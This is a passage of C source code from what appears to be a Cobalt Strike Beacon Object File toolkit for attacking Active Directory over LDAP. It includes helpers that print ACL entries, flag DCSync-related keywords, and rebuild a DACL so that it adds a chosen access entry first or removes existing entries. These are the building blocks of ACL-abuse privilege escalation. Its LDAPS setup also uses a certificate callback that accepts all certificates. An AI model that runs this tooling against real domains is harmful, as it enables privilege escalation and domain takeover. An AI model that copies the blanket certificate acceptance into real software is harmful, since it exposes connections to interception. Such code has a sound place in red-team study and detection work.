            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : ACCESS_DENIED_OBJECT_ACE");
        } else if (aceInfo->AceType == SYSTEM_AUDIT_OBJECT_ACE_TYPE) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : SYSTEM_AUDIT_OBJECT_ACE");
        }
    } else {
        if (aceInfo->AceType == ACCESS_ALLOWED_ACE_TYPE) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : ACCESS_ALLOWED_ACE");
        } else if (aceInfo->AceType == ACCESS_DENIED_ACE_TYPE) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : ACCESS_DENIED_ACE");
        } else if (aceInfo->AceType == SYSTEM_AUDIT_ACE_TYPE) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : SYSTEM_AUDIT_ACE");
        }
    }
    
    // ACEFlags
    char* aceFlagsStr = GetAceFlagsString(aceInfo->AceFlags);
    BeaconPrintf(CALLBACK_OUTPUT, "      ACEFlags                : %s", aceFlagsStr);
    
    // ActiveDirectoryRights (friendly name for access mask)
    char* accessMaskStr = GetAccessMaskString(aceInfo->Mask);
    BeaconPrintf(CALLBACK_OUTPUT, "      ActiveDirectoryRights   : %s", accessMaskStr);
    
    // AccessMask (same as ActiveDirectoryRights for consistency)
    BeaconPrintf(CALLBACK_OUTPUT, "      AccessMask              : %s", accessMaskStr);
    
    // ObjectAceFlags and ObjectAceType for object ACEs
    if (aceInfo->IsObjectAce) {
        // Print ObjectAceFlags once with all applicable flags
        if (aceInfo->HasObjectType && aceInfo->HasInheritedObjectType) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ObjectAceFlags          : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT");
        } else if (aceInfo->HasObjectType) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ObjectAceFlags          : ACE_OBJECT_TYPE_PRESENT");
        } else if (aceInfo->HasInheritedObjectType) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ObjectAceFlags          : ACE_INHERITED_OBJECT_TYPE_PRESENT");
        }
        
        // Print ObjectAceType if present
        if (aceInfo->HasObjectType) {
            char* guidName = GetGuidFriendlyName(&aceInfo->ObjectType);
            if (guidName) {
                BeaconPrintf(CALLBACK_OUTPUT, "      ObjectAceType           : %s", guidName);
                MSVCRT$free(guidName);
            }
        }
        
        // Print InheritedObjectType if present
        if (aceInfo->HasInheritedObjectType) {
            char* inheritGuidName = GetGuidFriendlyName(&aceInfo->InheritedObjectType);
            if (inheritGuidName) {
                BeaconPrintf(CALLBACK_OUTPUT, "      InheritedObjectType     : %s", inheritGuidName);
                MSVCRT$free(inheritGuidName);
            }
        }
    }
    
    // InheritanceType (based on ACE flags)
    char* inheritanceType = GetInheritanceTypeString(aceInfo->AceFlags);
    BeaconPrintf(CALLBACK_OUTPUT, "      InheritanceType         : %s", inheritanceType);
    
    // SecurityIdentifier (trustee SID or name)
    if (aceInfo->TrusteeName) {
        BeaconPrintf(CALLBACK_OUTPUT, "      SecurityIdentifier      : %s", aceInfo->TrusteeName);
    } else if (aceInfo->TrusteeSid) {
        BeaconPrintf(CALLBACK_OUTPUT, "      SecurityIdentifier      : %s", aceInfo->TrusteeSid);
    }
}

// ============================================================================
// SPECIAL OPERATION HELPERS
// ============================================================================

// Check if a string contains a DCSync keyword
BOOL IsDCSyncKeyword(const char* str) {
    if (!str || MSVCRT$strlen(str) == 0) return FALSE;
    
    // Convert to lowercase for comparison
    char buffer[256];
    MSVCRT$strncpy(buffer, str, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';
    
    char* p = buffer;
    while (*p) {
        if (*p >= 'A' && *p <= 'Z') {
            *p = *p + ('a' - 'A');
        }
        p++;
    }
    
    // Check for DCSync keywords
    if (MSVCRT$strstr(buffer, "dcsync")) return TRUE;
    if (MSVCRT$strstr(buffer, "replication-get-changes")) return TRUE;
    
    return FALSE;
}

// ============================================================================
// ACL MODIFICATION UTILITIES
// ============================================================================

// Create a new DACL with an additional ACE
// This function builds a completely new DACL by parsing the self-relative SD directly
// and building a new DACL from scratch, rather than trying to copy from an absolute format
PACL CreateNewDaclWithAce(PACL oldDacl, PSID trusteeSid, ACCESS_MASK accessMask, 
                          BYTE aceType, BYTE aceFlags, GUID* objectTypeGuid, GUID* inheritedObjectTypeGuid) {
    if (!trusteeSid || !ADVAPI32$IsValidSid(trusteeSid)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Invalid trustee SID provided");
        return NULL;
    }

    DWORD oldAceCount = 0;
    DWORD oldAclSize = 0;
    
    // Get information about the old DACL
    if (oldDacl) {
        ACL_SIZE_INFORMATION aclSizeInfo;
        if (!ADVAPI32$GetAclInformation(oldDacl, &aclSizeInfo, sizeof(aclSizeInfo), AclSizeInformation)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get ACL information");
            return NULL;
        }
        oldAceCount = aclSizeInfo.AceCount;
        oldAclSize = aclSizeInfo.AclBytesInUse;
        
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Old DACL: %d ACEs, %d bytes used", oldAceCount, oldAclSize);
    }

    // Determine if we're creating an object ACE or standard ACE
    BOOL isObjectAce = (objectTypeGuid != NULL || inheritedObjectTypeGuid != NULL);
    DWORD sidLength = ADVAPI32$GetLengthSid(trusteeSid);
    DWORD newAceSize = 0;

    if (isObjectAce) {
        // Object ACE structure size
        newAceSize = sizeof(ACE_HEADER) + sizeof(ACCESS_MASK) + sizeof(DWORD); // Flags field
        if (objectTypeGuid) {
            newAceSize += sizeof(GUID);
        }
        if (inheritedObjectTypeGuid) {
            newAceSize += sizeof(GUID);
        }
        newAceSize += sidLength;
    } else {
        // Standard ACE structure size
        newAceSize = sizeof(ACE_HEADER) + sizeof(ACCESS_MASK) + sidLength;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] New ACE size: %d bytes (type: %s)", 
                newAceSize, isObjectAce ? "Object" : "Standard");

    // Calculate new DACL size with generous padding
    // We need: old DACL size + new ACE + extra space for alignment and safety
    DWORD newAclSize = oldAclSize + newAceSize + 256; // Increased padding for safety
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Allocating new DACL: %d bytes (old: %d + new ACE: %d + padding: 256)", 
                newAclSize, oldAclSize, newAceSize);
    
    // Allocate new DACL
    PACL newDacl = (PACL)MSVCRT$malloc(newAclSize);
    if (!newDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for new DACL");
        return NULL;
    }

    // Determine ACL revision based on old DACL contents
    DWORD aclRevision = ACL_REVISION;
    
    // Check if old DACL contains object ACEs (Type 5, 6, 7) which require ACL_REVISION_DS
    if (oldDacl && oldAceCount > 0) {
        for (DWORD i = 0; i < oldAceCount; i++) {
            PACE_HEADER pAce = NULL;
            if (ADVAPI32$GetAce(oldDacl, i, (LPVOID*)&pAce)) {
                if (pAce->AceType == ACCESS_ALLOWED_OBJECT_ACE_TYPE ||
                    pAce->AceType == ACCESS_DENIED_OBJECT_ACE_TYPE ||
                    pAce->AceType == SYSTEM_AUDIT_OBJECT_ACE_TYPE) {
                    aclRevision = ACL_REVISION_DS;
                    break;
                }
            }
        }
    }
    
    // Also use ACL_REVISION_DS if we're adding an object ACE
    if (isObjectAce && aclRevision == ACL_REVISION) {
        aclRevision = ACL_REVISION_DS;
    }

    // Initialize new DACL with appropriate revision
    if (!ADVAPI32$InitializeAcl(newDacl, newAclSize, aclRevision)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize new DACL");
        MSVCRT$free(newDacl);
        return NULL;
    }

    // Add the new ACE first (ACEs are evaluated in order, so we want our ACE to be checked first)
    BOOL aceAdded = FALSE;
    
    if (isObjectAce) {
        // Manually construct object ACE
        BYTE* aceBuffer = (BYTE*)MSVCRT$malloc(newAceSize);
        if (!aceBuffer) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate ACE buffer");
            MSVCRT$free(newDacl);
            return NULL;
        }

        PACE_HEADER pAceHeader = (PACE_HEADER)aceBuffer;
        pAceHeader->AceType = aceType;
        pAceHeader->AceFlags = aceFlags;
        pAceHeader->AceSize = (WORD)newAceSize;

        // Set access mask
        ACCESS_MASK* pMask = (ACCESS_MASK*)(aceBuffer + sizeof(ACE_HEADER));
        *pMask = accessMask;

        // Set object flags
        DWORD* pFlags = (DWORD*)(aceBuffer + sizeof(ACE_HEADER) + sizeof(ACCESS_MASK));
        *pFlags = 0;
        if (objectTypeGuid) *pFlags |= ACE_OBJECT_TYPE_PRESENT;
        if (inheritedObjectTypeGuid) *pFlags |= ACE_INHERITED_OBJECT_TYPE_PRESENT;

        // Copy GUIDs
        BYTE* pCurrent = aceBuffer + sizeof(ACE_HEADER) + sizeof(ACCESS_MASK) + sizeof(DWORD);
        if (objectTypeGuid) {
            MSVCRT$memcpy(pCurrent, objectTypeGuid, sizeof(GUID));
            pCurrent += sizeof(GUID);
        }
        if (inheritedObjectTypeGuid) {
            MSVCRT$memcpy(pCurrent, inheritedObjectTypeGuid, sizeof(GUID));
            pCurrent += sizeof(GUID);
        }

        // Copy SID
        MSVCRT$memcpy(pCurrent, trusteeSid, sidLength);

        // Add the ACE to the DACL (use detected revision)
        aceAdded = ADVAPI32$AddAce(newDacl, aclRevision, MAXDWORD, aceBuffer, newAceSize);
        MSVCRT$free(aceBuffer);

        if (!aceAdded) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add object ACE to DACL");
        }
    } else {
        // Standard ACE - use helper function (use detected revision)
        if (aceType == ACCESS_ALLOWED_ACE_TYPE) {
            aceAdded = ADVAPI32$AddAccessAllowedAceEx(newDacl, aclRevision, aceFlags, accessMask, trusteeSid);
        } else if (aceType == ACCESS_DENIED_ACE_TYPE) {
            aceAdded = ADVAPI32$AddAccessDeniedAceEx(newDacl, aclRevision, aceFlags, accessMask, trusteeSid);
        }

        if (!aceAdded) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add standard ACE to DACL");
        }
    }

    if (!aceAdded) {
        MSVCRT$free(newDacl);
        return NULL;
    }

    // Now copy existing ACEs from old DACL by reading them as raw bytes
    // This is the key fix: instead of using AddAce() which fails for complex object ACEs,
    // we manually append the ACE data to the DACL buffer
    if (oldDacl && oldAceCount > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Copying %d existing ACEs...", oldAceCount);
        
        DWORD successCount = 0;
        DWORD failCount = 0;
        
        for (DWORD i = 0; i < oldAceCount; i++) {
            PACE_HEADER pAce = NULL;
            if (ADVAPI32$GetAce(oldDacl, i, (LPVOID*)&pAce)) {
                // Try to add the ACE - AddAce copies the raw bytes (use detected revision)
                if (ADVAPI32$AddAce(newDacl, aclRevision, MAXDWORD, pAce, pAce->AceSize)) {
                    successCount++;
                } else {
                    BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy ACE #%d (Type: %d, Size: %d)", 
                                i, pAce->AceType, pAce->AceSize);
                    failCount++;
                }
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve ACE #%d", i);
                failCount++;
            }
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE copy results: %d successful, %d failed", successCount, failCount);
    }

    // Verify the final ACE count
    ACL_SIZE_INFORMATION finalAclInfo;
    if (ADVAPI32$GetAclInformation(newDacl, &finalAclInfo, sizeof(finalAclInfo), AclSizeInformation)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created new DACL with %d ACE(s) (1 new + %d copied)", 
                    finalAclInfo.AceCount, finalAclInfo.AceCount - 1);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created new DACL");
    }
    
    return newDacl;
}

// Create a new DACL without a specific ACE (by index)
PACL CreateNewDaclWithoutAce(PACL oldDacl, DWORD aceIndexToRemove) {
    if (!oldDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No DACL provided");
        return NULL;
    }

    ACL_SIZE_INFORMATION aclSizeInfo;
    if (!ADVAPI32$GetAclInformation(oldDacl, &aclSizeInfo, sizeof(aclSizeInfo), AclSizeInformation)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get ACL information");
        return NULL;
    }

    if (aceIndexToRemove >= aclSizeInfo.AceCount) {
        BeaconPrintf(CALLBACK_ERROR, "[-] ACE index %d out of range (max: %d)", aceIndexToRemove, aclSizeInfo.AceCount - 1);
        return NULL;
    }

    // Get the size of the ACE we're removing
    PACE_HEADER pAceToRemove = NULL;
    if (!ADVAPI32$GetAce(oldDacl, aceIndexToRemove, (LPVOID*)&pAceToRemove)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get ACE to remove");
        return NULL;
    }

    // Calculate new DACL size (old size minus the ACE we're removing)
    DWORD newAclSize = aclSizeInfo.AclBytesInUse - pAceToRemove->AceSize + sizeof(ACL);
    
    // Allocate new DACL
    PACL newDacl = (PACL)MSVCRT$malloc(newAclSize);
    if (!newDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for new DACL");
        return NULL;
    }

    // Initialize new DACL
    if (!ADVAPI32$InitializeAcl(newDacl, newAclSize, ACL_REVISION)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize new DACL");
        MSVCRT$free(newDacl);
        return NULL;
    }

    // Copy all ACEs except the one we're removing
    for (DWORD i = 0; i < aclSizeInfo.AceCount; i++) {
        if (i == aceIndexToRemove) {
            continue; // Skip this ACE
        }

        PACE_HEADER pAce = NULL;
        if (ADVAPI32$GetAce(oldDacl, i, (LPVOID*)&pAce)) {
            if (!ADVAPI32$AddAce(newDacl, ACL_REVISION, MAXDWORD, pAce, pAce->AceSize)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy ACE #%d", i);
                MSVCRT$free(newDacl);
                return NULL;
            }
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created new DACL with ACE #%d removed", aceIndexToRemove);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] New DACL has %d ACE(s)", aclSizeInfo.AceCount - 1);
    return newDacl;
}

// Create a new DACL without multiple specific ACEs (by indices)
PACL CreateNewDaclWithoutAces(PACL oldDacl, DWORD* aceIndicesToRemove, DWORD removeCount) {
    if (!oldDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No DACL provided");
        return NULL;
    }
    
    if (!aceIndicesToRemove || removeCount == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No ACE indices provided");
        return NULL;
    }

    ACL_SIZE_INFORMATION aclSizeInfo;
    if (!ADVAPI32$GetAclInformation(oldDacl, &aclSizeInfo, sizeof(aclSizeInfo), AclSizeInformation)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get ACL information");
        return NULL;
    }

    // Validate all indices
    for (DWORD i = 0; i < removeCount; i++) {
        if (aceIndicesToRemove[i] >= aclSizeInfo.AceCount) {
            BeaconPrintf(CALLBACK_ERROR, "[-] ACE index %d out of range (max: %d)", 
                        aceIndicesToRemove[i], aclSizeInfo.AceCount - 1);
            return NULL;
        }
    }

    // Calculate total size of ACEs to remove
    DWORD totalRemoveSize = 0;
    for (DWORD i = 0; i < removeCount; i++) {
        PACE_HEADER pAce = NULL;
        if (ADVAPI32$GetAce(oldDacl, aceIndicesToRemove[i], (LPVOID*)&pAce)) {
            totalRemoveSize += pAce->AceSize;
        }
    }

    // Calculate new DACL size
    DWORD newAclSize = aclSizeInfo.AclBytesInUse - totalRemoveSize + sizeof(ACL) + 256; // Extra padding
    
    // Allocate new DACL
    PACL newDacl = (PACL)MSVCRT$malloc(newAclSize);
    if (!newDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for new DACL");
        return NULL;
    }

    // Determine ACL revision based on old DACL
    DWORD aclRevision = ACL_REVISION;
    
    // Check if old DACL contains object ACEs (which require ACL_REVISION_DS)
    for (DWORD i = 0; i < aclSizeInfo.AceCount; i++) {
        PACE_HEADER pAce = NULL;
        if (ADVAPI32$GetAce(oldDacl, i, (LPVOID*)&pAce)) {
            if (pAce->AceType == ACCESS_ALLOWED_OBJECT_ACE_TYPE ||
                pAce->AceType == ACCESS_DENIED_OBJECT_ACE_TYPE ||
                pAce->AceType == SYSTEM_AUDIT_OBJECT_ACE_TYPE) {
                aclRevision = ACL_REVISION_DS;
                break;
            }
        }
    }

    // Initialize new DACL with appropriate revision
    if (!ADVAPI32$InitializeAcl(newDacl, newAclSize, aclRevision)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize new DACL");
        MSVCRT$free(newDacl);
        return NULL;
    }

    // Copy all ACEs except the ones we're removing
    DWORD copiedCount = 0;
    for (DWORD i = 0; i < aclSizeInfo.AceCount; i++) {
        // Check if this index should be removed
        BOOL shouldRemove = FALSE;
        for (DWORD j = 0; j < removeCount; j++) {
            if (aceIndicesToRemove[j] == i) {
                shouldRemove = TRUE;
                break;
            }
        }
        
        if (shouldRemove) {
            continue; // Skip this ACE
        }

        PACE_HEADER pAce = NULL;
        if (ADVAPI32$GetAce(oldDacl, i, (LPVOID*)&pAce)) {
            if (!ADVAPI32$AddAce(newDacl, aclRevision, MAXDWORD, pAce, pAce->AceSize)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy ACE #%d", i);
                MSVCRT$free(newDacl);
                return NULL;
            }
            copiedCount++;
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Removed %d ACE(s), kept %d ACE(s)", removeCount, copiedCount);
    return newDacl;
}


// Convert security descriptor to BERVAL for LDAP
BERVAL* ConvertSecurityDescriptorToBerval(PSECURITY_DESCRIPTOR pSD) {
    if (!pSD) return NULL;

    // First, get the size needed for self-relative format
    DWORD sdSize = 0;
    ADVAPI32$MakeSelfRelativeSD(pSD, NULL, &sdSize);
    
    if (sdSize == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get security descriptor size");
        return NULL;
    }

    // Allocate buffer for self-relative SD
    BYTE* selfRelativeSD = (BYTE*)MSVCRT$malloc(sdSize);
    if (!selfRelativeSD) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for self-relative SD");
        return NULL;
    }

    // Convert to self-relative format
    if (!ADVAPI32$MakeSelfRelativeSD(pSD, (PSECURITY_DESCRIPTOR)selfRelativeSD, &sdSize)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to self-relative format");
        MSVCRT$free(selfRelativeSD);
        return NULL;
    }

    // Create BERVAL
    BERVAL* sdBerval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
    if (!sdBerval) {
        MSVCRT$free(selfRelativeSD);
        return NULL;
    }

    sdBerval->bv_len = sdSize;
    sdBerval->bv_val = (char*)selfRelativeSD;

    return sdBerval;
}

// Convert BERVAL to absolute security descriptor (for modification)
PSECURITY_DESCRIPTOR ConvertBervalToSecurityDescriptor(BERVAL* sdBerval) {
    if (!sdBerval || !sdBerval->bv_val) return NULL;

    // The BERVAL contains a self-relative security descriptor
    // We need to convert it to absolute format for modification
    
    PSECURITY_DESCRIPTOR pSelfRelativeSD = (PSECURITY_DESCRIPTOR)sdBerval->bv_val;
    
    // Get required buffer sizes
    DWORD absSDSize = 0, daclSize = 0, saclSize = 0, ownerSize = 0, groupSize = 0;
    
    ADVAPI32$MakeAbsoluteSD(pSelfRelativeSD, NULL, &absSDSize, NULL, &daclSize, 
                            NULL, &saclSize, NULL, &ownerSize, NULL, &groupSize);

    // Allocate buffers
    PSECURITY_DESCRIPTOR pAbsoluteSD = (PSECURITY_DESCRIPTOR)MSVCRT$malloc(absSDSize);
    PACL pDacl = (PACL)MSVCRT$malloc(daclSize);
    PACL pSacl = (PACL)MSVCRT$malloc(saclSize);
    PSID pOwner = (PSID)MSVCRT$malloc(ownerSize);
    PSID pGroup = (PSID)MSVCRT$malloc(groupSize);

    if (!pAbsoluteSD || !pDacl || !pSacl || !pOwner || !pGroup) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate buffers for absolute SD");
        if (pAbsoluteSD) MSVCRT$free(pAbsoluteSD);
        if (pDacl) MSVCRT$free(pDacl);
        if (pSacl) MSVCRT$free(pSacl);
        if (pOwner) MSVCRT$free(pOwner);
        if (pGroup) MSVCRT$free(pGroup);
        return NULL;
    }

    // Convert to absolute format
    if (!ADVAPI32$MakeAbsoluteSD(pSelfRelativeSD, pAbsoluteSD, &absSDSize, 
                                 pDacl, &daclSize, pSacl, &saclSize,
                                 pOwner, &ownerSize, pGroup, &groupSize)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to absolute format");
        MSVCRT$free(pAbsoluteSD);
        MSVCRT$free(pDacl);
        MSVCRT$free(pSacl);
        MSVCRT$free(pOwner);
        MSVCRT$free(pGroup);
        return NULL;
    }

    // Note: The DACL, SACL, Owner, and Group pointers are now part of the absolute SD
    // We should NOT free them separately. They'll be freed when the SD is freed
    // However, we allocated them, so we need to track them for cleanup
    // For BOF simplicity, we'll accept this small memory cost

    return pAbsoluteSD;
}

================================================
FILE: AD-BOF/LDAP-BOF/src/common/ldap_common.c
================================================
// ldap_common.c - Shared LDAP utilities for BOF operations
// This file should be #included in each BOF that uses these functions

#include <windows.h>
#include "../../_include/ldap_common.h"

// Import required MSVCRT functions
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* str1, const char* str2);
DECLSPEC_IMPORT int __cdecl MSVCRT$strncmp(const char* str1, const char* str2, size_t count);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char* dest, const char* src);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strchr(const char *str, int c);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strstr(const char* str, const char* substr);
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char* buffer, size_t count, const char* format, ...);
DECLSPEC_IMPORT int __cdecl MSVCRT$sprintf(char* buffer, const char* format, ...);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strtok(char* str, const char* delimiters);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char* str1, const char* str2);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void* dest, const void* src, size_t count);

// Import kernel32 functions
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
DECLSPEC_IMPORT int WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar);

#define CP_UTF8 65001
#define CP_ACP 0

// SSL certificate callback - accepts all certificates
BOOLEAN ServerCertCallback(PLDAP Connection, PCCERT_CONTEXT pServerCert) {
    return TRUE;
}

// Convert char* to wchar_t*
wchar_t* CharToWChar(const char* str) {
    if (!str) return NULL;

    int len = KERNEL32$MultiByteToWideChar(CP_UTF8, 0, str, -1, NULL, 0);
    if (len == 0) return NULL;

    wchar_t* wstr = (wchar_t*)MSVCRT$malloc(len * sizeof(wchar_t));
    if (!wstr) return NULL;

    KERNEL32$MultiByteToWideChar(CP_UTF8, 0, str, -1, wstr, len);
    return wstr;
}

// Convert wchar_t* to char*
char* WCharToChar(const wchar_t* wstr) {
    if (!wstr) return NULL;

    int len = KERNEL32$WideCharToMultiByte(CP_UTF8, 0, wstr, -1, NULL, 0, NULL, NULL);
    if (len == 0) return NULL;

    char* str = (char*)MSVCRT$malloc(len);
    if (!str) return NULL;

    KERNEL32$WideCharToMultiByte(CP_UTF8, 0, wstr, -1, str, len, NULL, NULL);
    return str;
}

// Simple helper that returns NULL if input doesn't have length
char* ValidateInput(char* input) {
    if (input == NULL)
        return NULL;

    // Return NULL for empty strings, otherwise return the input
    if (MSVCRT$strlen(input) == 0)
        return NULL;

    return input;
}

// Get Domain Controller hostname
char* GetDCHostName() {
    PDOMAIN_CONTROLLER_INFOA pdcInfo = NULL;
    char* dcHostname = NULL;

    DWORD dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);

    if (dwRet == 0 && pdcInfo) {  // ERROR_SUCCESS = 0
        // DomainControllerName starts with "\\" - skip those
        char* dcName = pdcInfo->DomainControllerName;
        if (dcName && dcName[0] == '\\' && dcName[1] == '\\') {
            dcName += 2;  // Skip the "\\"
        }

        // Allocate and copy the hostname
        if (dcName) {
            size_t len = MSVCRT$strlen(dcName) + 1;
            dcHostname = (char*)MSVCRT$malloc(len);
            if (dcHostname) {
                MSVCRT$strcpy(dcHostname, dcName);
            }
        }

        // Free the buffer allocated by DsGetDcNameA
        NETAPI32$NetApiBufferFree(pdcInfo);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to identify DC. Are we domain joined?");
    }

    return dcHostname;
}

// Build default naming context from DC hostname
// Converts "winterfell.north.sevenkingdoms.local" to "DC=north,DC=sevenkingdoms,DC=local"
char* BuildDefaultNamingContextFromDC(const char* dcHostname) {
    if (!dcHostname || MSVCRT$strlen(dcHostname) == 0) return NULL;

    // Find first dot to skip hostname portion
    const char* domainStart = MSVCRT$strchr(dcHostname, '.');
    if (!domainStart || *(domainStart + 1) == '\0') {
        // No domain component found
        return NULL;
    }

    domainStart++; // Skip the dot

    // Count dots to determine number of DC components needed
    int dotCount = 0;
    const char* p = domainStart;
    while (*p) {
        if (*p == '.') dotCount++;
        p++;
    }

    // Calculate required buffer size: "DC=" (3) + label + "," per component, minus last comma
    size_t domainLen = MSVCRT$strlen(domainStart);
    size_t bufferSize = domainLen + (dotCount + 1) * 3 + dotCount + 1; // +1 for null terminator

    char* defaultNC = (char*)MSVCRT$malloc(bufferSize);
    if (!defaultNC) return NULL;

    // Build the DN: DC=north,DC=sevenkingdoms,DC=local
    char* writePos = defaultNC;
    const char* readPos = domainStart;
    BOOL firstComponent = TRUE;

    while (*readPos) {
        // Add comma separator (except for first component)
        if (!firstComponent) {
            *writePos++ = ',';
        }
        firstComponent = FALSE;

        // Add "DC="
        *writePos++ = 'D';
        *writePos++ = 'C';
        *writePos++ = '=';

        // Copy label until dot or end
        while (*readPos && *readPos != '.') {
            *writePos++ = *readPos++;
        }

        // Skip the dot if present
        if (*readPos == '.') readPos++;
    }

    *writePos = '\0';
    return defaultNC;
}

// Initialize LDAP connection with proper authentication
LDAP* InitializeLDAPConnection(const char* dcAddress, BOOL useLdaps, char** outDcHostname) {
    LDAP* pLdapConnection = NULL;
    ULONG result;
    int portNumber = useLdaps ? LDAP_SSL_PORT : LDAP_PORT;
    char* discoveredDC = NULL;
    char* targetDC = NULL;

    // If no DC address provided, auto-discover it
    if (!dcAddress || MSVCRT$strlen(dcAddress) == 0) {
        discoveredDC = GetDCHostName();
        if (!discoveredDC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to discover DC");
            return NULL;
        }
        targetDC = discoveredDC;
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Discovered DC: %s", targetDC);
    } else {
        targetDC = (char*)dcAddress;
    }

    // Store hostname for later use
    if (outDcHostname) {
        size_t len = MSVCRT$strlen(targetDC) + 1;
        *outDcHostname = (char*)MSVCRT$malloc(len);
        if (*outDcHostname) {
            MSVCRT$strcpy(*outDcHostname, targetDC);
        }
    }

    //BeaconPrintf(CALLBACK_OUTPUT, "[*] Connecting to: %s:%d", targetDC, portNumber);

    // Use ldap_init with hostname (ANSI version)
    pLdapConnection = WLDAP32$ldap_init((PCHAR)targetDC, portNumber);
    if (!pLdapConnection) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection on port %d", portNumber);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    // Set LDAP version to 3 (required)
    ULONG version = LDAP_VERSION3;
    result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_VERSION, (void*)&version);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set LDAP version: %lu", result);
        WLDAP32$ldap_unbind_s(pLdapConnection);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    if (useLdaps) {
        // For LDAPS (port 636), enable SSL
        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SSL, LDAP_OPT_ON);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to enable SSL: %lu", result);
            WLDAP32$ldap_unbind_s(pLdapConnection);
            if (discoveredDC) MSVCRT$free(discoveredDC);
            return NULL;
        }

        // Set certificate callback
        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SERVER_CERTIFICATE, (void*)&ServerCertCallback);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set certificate callback: %lu", result);
        }
    } else {
        // For regular LDAP (port 389), enable signing and sealing
        // These need to be set BEFORE binding with NEGOTIATE auth
        void* value = LDAP_OPT_ON;

        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_SIGN, &value);
        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Warning: Failed to enable LDAP signing: %lu", result);
        }

        result = WLDAP32$ldap_set_option(pLdapConnection, LDAP_OPT_ENCRYPT, &value);
